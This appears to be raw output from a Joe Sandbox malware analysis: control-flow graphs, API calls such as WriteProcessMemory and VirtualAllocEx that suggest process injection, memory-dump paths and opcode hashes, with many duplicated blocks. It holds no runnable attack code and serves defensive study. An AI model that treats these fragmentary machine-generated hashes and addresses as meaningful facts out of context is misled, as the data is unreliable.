                                                                                                                                                  control_flow_graph 452 e6b7b7-e6b7d7 453 e6b803-e6b807 452->453 454 e6b7d9-e6b7e6 call e6b458 452->454 456 e6b81b-e6b85c 453->456 457 e6b809-e6b813 453->457 460 e6b7fc 454->460 461 e6b7e8 454->461 463 e6b85e-e6b866 456->463 464 e6b869-e6b877 456->464 457->456 460->453 509 e6b7ee call e6ba53 461->509 510 e6b7ee call e6ba60 461->510 463->464 465 e6b89b-e6b89d 464->465 466 e6b879-e6b87e 464->466 471 e6b8a0-e6b8a7 465->471 468 e6b880-e6b887 call e6b464 466->468 469 e6b889 466->469 467 e6b7f4-e6b7f6 467->460 470 e6b938-e6b9f8 467->470 473 e6b88b-e6b899 468->473 469->473 502 e6ba00-e6ba2b GetModuleHandleW 470->502 503 e6b9fa-e6b9fd 470->503 474 e6b8b4-e6b8bb 471->474 475 e6b8a9-e6b8b1 471->475 473->471 476 e6b8bd-e6b8c5 474->476 477 e6b8c8-e6b8d1 call e6b474 474->477 475->474 476->477 483 e6b8d3-e6b8db 477->483 484 e6b8de-e6b8e3 477->484 483->484 485 e6b8e5-e6b8ec 484->485 486 e6b901-e6b905 484->486 485->486 488 e6b8ee-e6b8fe call e6b484 call e6b494 485->488 507 e6b908 call e6bd60 486->507 508 e6b908 call e6bd31 486->508 488->486 491 e6b90b-e6b90e 493 e6b910-e6b92e 491->493 494 e6b931-e6b937 491->494 493->494 504 e6ba34-e6ba48 502->504 505 e6ba2d-e6ba33 502->505 503->502 505->504 507->491 508->491 509->467 510->467
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E6BA1E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 4139908857-3816178591
                                                                                                                                                  • Opcode ID: 8de9a9b6684ed202f2b01c30b4bc22b9f8b88e8804036b3c62dc787f2dd2cb2c
                                                                                                                                                  • Instruction ID: 4f4c2ae69cb2f2d31acd192f0fafcdf0b0eb2982abbbb3f10a5ea7151ec8e1e6
                                                                                                                                                  • Opcode Fuzzy Hash: 8de9a9b6684ed202f2b01c30b4bc22b9f8b88e8804036b3c62dc787f2dd2cb2c
                                                                                                                                                  • Instruction Fuzzy Hash: D4815770A00B458FDB24DF29E15175ABBF5BF88344F008A2ED086E7B51DB74E885CB90

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 511 e658ec-e659b9 CreateActCtxA 513 e659c2-e65a1c 511->513 514 e659bb-e659c1 511->514 521 e65a1e-e65a21 513->521 522 e65a2b-e65a2f 513->522 514->513 521->522 523 e65a40 522->523 524 e65a31-e65a3d 522->524 526 e65a41 523->526 524->523 526->526
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00E659A9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 2289755597-3816178591
                                                                                                                                                  • Opcode ID: 82ad24a1e3471ff742f4562e33fa0c84a6723eda88ea17cda50a30d84dc7bb94
                                                                                                                                                  • Instruction ID: dc1f33c6965b41d4533439ebc687fe66dfd60dd44f8b0f0d62d11db91fa232c4
                                                                                                                                                  • Opcode Fuzzy Hash: 82ad24a1e3471ff742f4562e33fa0c84a6723eda88ea17cda50a30d84dc7bb94
                                                                                                                                                  • Instruction Fuzzy Hash: C641E2B1D00619CBDB24CFA9C8846CDBBB6BF88304F24816AD408AB255DB755986CF90

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 527 e644c4-e659b9 CreateActCtxA 530 e659c2-e65a1c 527->530 531 e659bb-e659c1 527->531 538 e65a1e-e65a21 530->538 539 e65a2b-e65a2f 530->539 531->530 538->539 540 e65a40 539->540 541 e65a31-e65a3d 539->541 543 e65a41 540->543 541->540 543->543
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00E659A9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 2289755597-3816178591
                                                                                                                                                  • Opcode ID: 9fe97ed2c538dcf5faea504734219f7305615dbd24c7f1e10fd96d263b477c1f
                                                                                                                                                  • Instruction ID: 7b1a344798d3819f8569eabe4a5c5033e52aa9734f25dd0610faf386fc8fdbb6
                                                                                                                                                  • Opcode Fuzzy Hash: 9fe97ed2c538dcf5faea504734219f7305615dbd24c7f1e10fd96d263b477c1f
                                                                                                                                                  • Instruction Fuzzy Hash: 4441FFB1D0071DCBDB24CFA9C884B9EBBB6BF88304F24816AD409BB251DB756945CF91

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 544 6d50530-6d50586 547 6d50596-6d505d5 WriteProcessMemory 544->547 548 6d50588-6d50594 544->548 550 6d505d7-6d505dd 547->550 551 6d505de-6d5060e 547->551 548->547 550->551
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D505C8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 3559483778-3816178591

Control-flow Graph
• [graph image not included; basic blocks 6d50538-6d5060e, call to WriteProcessMemory]
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D505C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d50000_file.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID: [Cx%
• API String ID: 3559483778-3816178591

Control-flow Graph
• [graph image not included; basic blocks 6d50620-6d506ee, call to ReadProcessMemory]
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D506A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d50000_file.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID: [Cx%
• API String ID: 1726664587-3816178591

Control-flow Graph
• [graph image not included; basic blocks 6d50628-6d506ee, call to ReadProcessMemory]
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D506A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d50000_file.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID: [Cx%
• API String ID: 1726664587-3816178591

Control-flow Graph
• [graph image not included; basic blocks e6dca8-e6dd62, call to DuplicateHandle]
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E6DD2F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_file.jbxd
Similarity
• API ID: DuplicateHandle
• String ID: [Cx%
• API String ID: 3793708945-3816178591

Control-flow Graph
• [graph image not included; basic blocks 6d50470-6d50521, call to VirtualAllocEx]
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D504E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d50000_file.jbxd
Similarity
• API ID: AllocVirtual
• String ID: [Cx%
• API String ID: 4275171209-3816178591

Control-flow Graph
• [graph image not included; basic blocks 6d50478-6d50521, call to VirtualAllocEx]
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D504E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d50000_file.jbxd
Similarity
• API ID: AllocVirtual
• String ID: [Cx%
• API String ID: 4275171209-3816178591

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00E6BA1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_file.jbxd
Similarity
• API ID: HandleModule
• String ID: [Cx%
• API String ID: 4139908857-3816178591

APIs
• PostMessageW.USER32(?,?,?,?), ref: 06D52995
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d50000_file.jbxd
Similarity
• API ID: MessagePost
• String ID: [Cx%
• API String ID: 410705778-3816178591

APIs
• PostMessageW.USER32(?,?,?,?), ref: 06D52995
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d50000_file.jbxd
Similarity
• API ID: MessagePost
• String ID: [Cx%
• API String ID: 410705778-3816178591

Memory Dump Source
• Source File: 00000000.00000002.1824488793.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_add000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                  • Opcode ID: cf0c5289eaf5937352fe908565001eccc3a0cfebe20cfabf4e66b0c9709a0a17
                                                                                                                                                  • Instruction ID: bd0bfd9e69af8dc0d64559fef1a6d26193067be09089727c11ee44fab34e7cb0
                                                                                                                                                  • Opcode Fuzzy Hash: cf0c5289eaf5937352fe908565001eccc3a0cfebe20cfabf4e66b0c9709a0a17
                                                                                                                                                  • Instruction Fuzzy Hash: B82103B1540240EFCB05DF14E9C0B26BF65FB98318F20C56AE80A0B356C336D856CBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824488793.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_add000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 01bc47fa013dff2b7d54bab5a05d6d14ee3d32f486c87ba85f94ce37291fbb3d
                                                                                                                                                  • Instruction ID: 0851b1e90506577a8ecd98cbc5f593e2824baa7059d449e8db092d49f8cbaa96
                                                                                                                                                  • Opcode Fuzzy Hash: 01bc47fa013dff2b7d54bab5a05d6d14ee3d32f486c87ba85f94ce37291fbb3d
                                                                                                                                                  • Instruction Fuzzy Hash: 672125B1500204EFDB05DF14D9C4B2ABF75FB98324F20C56AE90A4F356C336E856CAA2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824532043.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_aed000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 759419290c2ea82595577763c9807474a62826f344ae28f33bf73e0506dc25fd
                                                                                                                                                  • Instruction ID: 47947d66af06e3d4eabe9c17f48fedea2d06ca86ce88b78b2a7ca8c7e7256f07
                                                                                                                                                  • Opcode Fuzzy Hash: 759419290c2ea82595577763c9807474a62826f344ae28f33bf73e0506dc25fd
                                                                                                                                                  • Instruction Fuzzy Hash: 0B210171604280EFCB14DF25D9C4B26BFA5FB88314F28C56DE80A4B296C33BD847CA61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824532043.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_aed000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4504f3633702e878678b6a582d974dbcf728af1f7879bf66e065490b6dfb894b
                                                                                                                                                  • Instruction ID: a2546cb2418c0041a42925baf21e05580c6cdd531666cd615654f05796de8db5
                                                                                                                                                  • Opcode Fuzzy Hash: 4504f3633702e878678b6a582d974dbcf728af1f7879bf66e065490b6dfb894b
                                                                                                                                                  • Instruction Fuzzy Hash: 04212675504280EFDB05DF15DAC0B66BBB5FB84314F20C66DEA094F296C336D846CA61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824532043.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_aed000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 83cc771b1cef0d0fa63fb309ffd5cd421e6e4986815a9266cba00c1c6b08cbe7
                                                                                                                                                  • Instruction ID: b5f4f8692c31ad5df00f62d82b811c8de593d9f43f58ae05c7c5a059b81d0b2f
                                                                                                                                                  • Opcode Fuzzy Hash: 83cc771b1cef0d0fa63fb309ffd5cd421e6e4986815a9266cba00c1c6b08cbe7
                                                                                                                                                  • Instruction Fuzzy Hash: 1F215E755093C08FDB12CF24D994715BF71EB46314F28C5EAD8498F6A7C33A980ACB62
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824488793.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_add000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                  • Instruction ID: 44c1b3bf650aa77bfe164641477418ad43885590b909cdbd78e65f436b67e611
                                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                  • Instruction Fuzzy Hash: 1C11D376504280DFCB16CF14D5C4B16BF71FB94318F24C6AAD84A0B756C336D85ACBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824488793.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_add000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                  • Instruction ID: aeaa552d8b3e9efcb0839fa664057d88822349d3a2b36e64df06b4a584ebf931
                                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                  • Instruction Fuzzy Hash: 5111D3B6504240DFDB16CF14D5C4B16BF71FB94324F24C6AAD90A0B756C33AE85ACBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824532043.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_aed000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                  • Instruction ID: b37f2a4e91eb8446d658cab8ed70baaa572a06e4e7c21c14873391fbd094dd84
                                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                  • Instruction Fuzzy Hash: B411BB75504280DFCB02CF10C5C4B55BBA1FB84314F24C6AAD9494B296C33AD80ACB61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bdacf605b576032cb23ea4db5ec65d1d84022c39416970dd89d69193fe252263
                                                                                                                                                  • Instruction ID: 7e10989025e8ae48663016b499202bd6f3747fb1c8d821a7b30ef66299ce7e15
                                                                                                                                                  • Opcode Fuzzy Hash: bdacf605b576032cb23ea4db5ec65d1d84022c39416970dd89d69193fe252263
                                                                                                                                                  • Instruction Fuzzy Hash: 4BE10974E041198FDB54DFA9C5809AEFBF2FF89304F248169E815AB356D730A941CFA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b2a3819a2249f987c0ca729a65943e7b8597dfc1682f6b9177cd370da638e71e
                                                                                                                                                  • Instruction ID: e44253b9dae2638a1790d465eeecbad8efaab423eb6e30b0c977fb3f19c0658c
                                                                                                                                                  • Opcode Fuzzy Hash: b2a3819a2249f987c0ca729a65943e7b8597dfc1682f6b9177cd370da638e71e
                                                                                                                                                  • Instruction Fuzzy Hash: E6A16B36E402098FCF05DFB4E8549AEB7F2FF84344B15956AE802BB265DB31E915CB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ca12d9c27d690fdeed738b8e3000e92fd9fdae63995a00774a1b02bcae24c7dd
                                                                                                                                                  • Instruction ID: ee6eaa49accdbf4f145e39e4269afae87c6316d5c6f0ed1960f024c6fed8b194
                                                                                                                                                  • Opcode Fuzzy Hash: ca12d9c27d690fdeed738b8e3000e92fd9fdae63995a00774a1b02bcae24c7dd
                                                                                                                                                  • Instruction Fuzzy Hash: DA31B4B1D056288BEF68CF6BCC047DAFAF6AFC9304F05D1AAC41CA6254DB740A858F51
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                                  • API String ID: 0-879173519
                                                                                                                                                  • Opcode ID: 58b2f703dc623b9477b5348e06c2a8b8e2c92552f98504b395ec7b80abf92f3a
                                                                                                                                                  • Instruction ID: b88cb23e8efea53d4cd65499dce35cad6bc276f4b1328715604685ccc94652d1
                                                                                                                                                  • Opcode Fuzzy Hash: 58b2f703dc623b9477b5348e06c2a8b8e2c92552f98504b395ec7b80abf92f3a
                                                                                                                                                  • Instruction Fuzzy Hash: B2F12B31A00215CFDB15EFA9C884AADBFF6BF89314F258465E945AB361DB30E841CB61
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                                  • API String ID: 0-2732225958
• Opcode ID: 474b0ecf6c048e772b6affc7d20645ea16bd645cb724196126e95a53d1db4b16
• Instruction ID: a690200ecf388bf80644235010935f193a8d8c11dad072f448ea976e2d90dd2d
• Opcode Fuzzy Hash: 474b0ecf6c048e772b6affc7d20645ea16bd645cb724196126e95a53d1db4b16
• Instruction Fuzzy Hash: FBB11731D40359CFCBA19FA8D4942AEBBB1FF84324F20496AC045EB255DB74C986CB92
Strings
Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID: (o^q$4'^q
• API String ID: 0-273632683
• Opcode ID: 74657b0237b0c7cd00286b84e3998fc14bfd2250c78f02d8d4475185e33faac3
• Instruction ID: b186b8c706f4fadb2f99f1b595cbe687fc4dcc4c5b0b30d65b0bec67aeb9ca37
• Opcode Fuzzy Hash: 74657b0237b0c7cd00286b84e3998fc14bfd2250c78f02d8d4475185e33faac3
• Instruction Fuzzy Hash: 00827E35A00209DFCB16DFA8C584AAEBBF2FF88310F158956E545AF366D770E981CB50
Strings
Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID: (o^q$Hbq
• API String ID: 0-662517225
• Opcode ID: b54040a9211d9e2c34fdae8bff2acd3602970ac7c617d4cbe106efaa25718df9
• Instruction ID: 1ffefc159d1926dc6b9b57c6ad00ca8ac54a1d77eafe7fecfd09a770ef9c63a6
• Opcode Fuzzy Hash: b54040a9211d9e2c34fdae8bff2acd3602970ac7c617d4cbe106efaa25718df9
• Instruction Fuzzy Hash: 3D128C71A00219DFDB15EF69C854AAEBBF6BF88300F208569E505EB395DF349D81CB90
Strings
Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID: Xbq$$^q
• API String ID: 0-1593437937
• Opcode ID: 578311c4d32019b145f381999f1eb76cfecb0490c598d84a97733ddf6f26344c
• Instruction ID: 83c55e5c75dbbeca3ba54e5eaf6a2590a9dd7047ce456cb9c72c092b7b4c144b
• Opcode Fuzzy Hash: 578311c4d32019b145f381999f1eb76cfecb0490c598d84a97733ddf6f26344c
• Instruction Fuzzy Hash: 49F14C74A04209DFDB18EFB9D8545AEBBF2FF88310B148929E506EB354CE359C46CB51
Strings
Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q
• API String ID: 0-1598597984
• Opcode ID: f90a8be960425d927990fcb609b7c3693a92ce67b25c54bd73f0e1610e1b30ce
• Instruction ID: 23401b77adcb2e7e95b8e572ba0d861fd3e796d64e170a5043e02276ac8bef99
• Opcode Fuzzy Hash: f90a8be960425d927990fcb609b7c3693a92ce67b25c54bd73f0e1610e1b30ce
• Instruction Fuzzy Hash: 86A1E675E00258CFDB14DFAAD884A9DBBF2BF89300F14806AE409BB365DB359945CF51
Strings
Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID: Xbq$Xbq
• API String ID: 0-1243427068
• Opcode ID: 2b270f5cc68d3b998f2c7c751cf6a5823da9a92ab45590939b28c8ba695f6a0b
• Instruction ID: 32fcf8a0844b3568753c2342633c002e8363a0d58eccde2589d21030bad7a88b
• Opcode Fuzzy Hash: 2b270f5cc68d3b998f2c7c751cf6a5823da9a92ab45590939b28c8ba695f6a0b
• Instruction Fuzzy Hash: 84518F327853568BDBD49E75D89427A7BE6BB80220B544C7FC405EF340DAB8C8828751
Strings
Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q
• API String ID: 0-1598597984
• Opcode ID: 7c719f9cd116a4ac0fe85317dcadeb045797ac32da8efc4050682f61ec15e468
• Instruction ID: 9075404874158888ee1cfac73e2209f25a480e8008f0ec65f598bd3c00f60370
• Opcode Fuzzy Hash: 7c719f9cd116a4ac0fe85317dcadeb045797ac32da8efc4050682f61ec15e468
• Instruction Fuzzy Hash: AD91D574E01258CFDB14DFA9D884A9DBBF2BF89300F1480AAE409BB365EB349845CF10
Strings
Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q
• API String ID: 0-1598597984
• Opcode ID: 2dec69f8dd211ada56810a993603366d0ca3b0d0e564dfe4873b88b5681bdbf7
• Instruction ID: 2ffdea849a044bc1fd68e1f513081f49edec861a2b0c2db380e2cab73a5a947b
• Opcode Fuzzy Hash: 2dec69f8dd211ada56810a993603366d0ca3b0d0e564dfe4873b88b5681bdbf7
• Instruction Fuzzy Hash: A3819174E00218CFDB54DFAAD884A9DBBF2BF89310F148069E819BB365DB349985CF50
Strings
Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1580000_file.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q
• API String ID: 0-1598597984
• Opcode ID: 5fc4baec80789e8508211201d49fcae7acd55596828681459ef3021893dd3d90
• Instruction ID: 4e0adb633b85cd8f1e4e874468b190934beeb780c4de5d1ecd54098892f71368
• Opcode Fuzzy Hash: 5fc4baec80789e8508211201d49fcae7acd55596828681459ef3021893dd3d90
• Instruction Fuzzy Hash: 7B81A274E01218CFDB54DFAAD984A9DBBF2BF89300F148069E819BB365DB749985CF10
Strings
Memory Dump Source
• Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
